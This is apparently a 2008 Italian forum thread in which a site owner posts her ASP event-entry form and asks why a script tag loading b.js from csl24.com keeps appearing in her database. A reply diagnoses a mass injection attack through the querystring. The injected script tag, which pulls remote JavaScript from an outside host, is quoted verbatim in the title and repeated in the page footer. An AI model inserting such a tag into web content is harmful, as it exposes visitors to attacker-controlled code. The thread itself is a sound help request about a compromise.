problema inserimento <script src=http://www.csl24.com/b.js></script> in DB

**Ashry** · 07-07-2008, 11:23

Ciao a tutti ho un problema con un DB, tramite form inserisco delle news in un database

Form:

Codice PHP:


        <form onSubmit="return CheckEventi();" method="post" name="Eventi">

        <tr>

          <td>Evento:</td>

          <td><input name="_evento" type="text" id="_evento" style="width:250px;"></td>

        </tr>

        <tr>

          <td class="td1"> Data: </td>

          <td>

            <select name="_giorno">

            <%

            for giorni=1 to 31 

            %>

            <option value="<%=Right("00" & giorni, 2)%>"><%=ctInd%></option>

            <%

            next

            %>

            </select>

             

            <select name="_mese">

            <%

            setlocale("it")

            for ctInd=1 to 12 

            %>

            <option value="<%=Right("00" & ctInd, 2)%>"><%= monthName(ctInd)%></option>

            <%

            next

            %> 

            </select>

             

            <select name="_anno">

            <%

            for ctInd=datePart("yyyy",now) to datePart("yyyy",now) + 10 step +1

            %>

            <option value="<%=ctInd%>"><%=ctInd%></option>

            <%

            next

            %> 

            </select>

         </td>

        </tr>

        <tr>

          <td>Organizzatore:</td>

          <td><input name="_organizzatore" type="text" id="_organizztore" style="width:250px;"></td>

        </tr>

        <tr>

          <td>Località:</td>

          <td><input name="_luogo" type="text" id="_luogo" style="width:250px;" maxlength="250"></td>

        </tr>

        <tr>

          <td>E-Mail</td>

          <td><input name="_email" type="text" id="_email" style="width:250px;"></td>

        </tr>

        <tr>

          <td>Descrizione:</td>

          <td><textarea name="_descrizione" style="width:250px; "></textarea></td>

        </tr>

        <tr>

          <td>Evento del mese</td>

          <td>

            <select name="_focus">

            <option value="Y">SI</option>

            <option value="N">NO</option>

            </select>

          </td>

        </tr>

        <tr>

        <td></td>

        <td><input name="submit" type="submit" value="Insert &raquo;&raquo;"></td>

        </tr>

        </form>

nella pagina di inserimento recupero i dati e li metto in una tabella ma accanto alle date mi ritrovo quel JS sapere che roba è?

Grazie

Ciao
Cinzia

**willybit** · 07-07-2008, 19:24

Ciao Ashry,

usi SQL Server?
Mi spiace dirtelo ma il tuo sito ha subito un html injection
Praticamente ti hanno scritto nel databse sfruttando del codice passato tramite querystring.
Molto probabilmente tutti i campi testuali del tuo db sono stati modificati. Ultimamente è successo molto spesso (anche a miei siti) senti qua cosa dicono

Discussione: problema inserimento <script src=http://www.csl24.com/b.js></script> in DB

Strumenti discussione

Ricerca discussione

Visualizza

problema inserimento <script src=http://www.csl24.com/b.js></script> in DB

Permessi di invio